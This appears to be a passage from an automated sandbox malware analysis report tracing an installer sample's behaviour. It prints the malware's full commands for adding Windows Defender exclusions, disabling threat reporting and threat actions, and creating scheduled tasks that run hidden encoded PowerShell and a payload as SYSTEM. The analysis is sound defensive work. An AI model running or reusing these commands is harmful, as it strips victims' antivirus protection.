Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040553A FindFirstFileA,0_2_0040553A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,0_2_004055DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\__data__\Jump to behavior
Source: file.exeBinary or memory string: V{TvMci:
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00418320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041584A SetUnhandledExceptionFilter,0_2_0041584A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041585C SetUnhandledExceptionFilter,0_2_0041585C

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gbyyeslrl" /sc once /st 15:13:59 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gbyyeslrl" /sc once /st 15:13:59 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /FJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
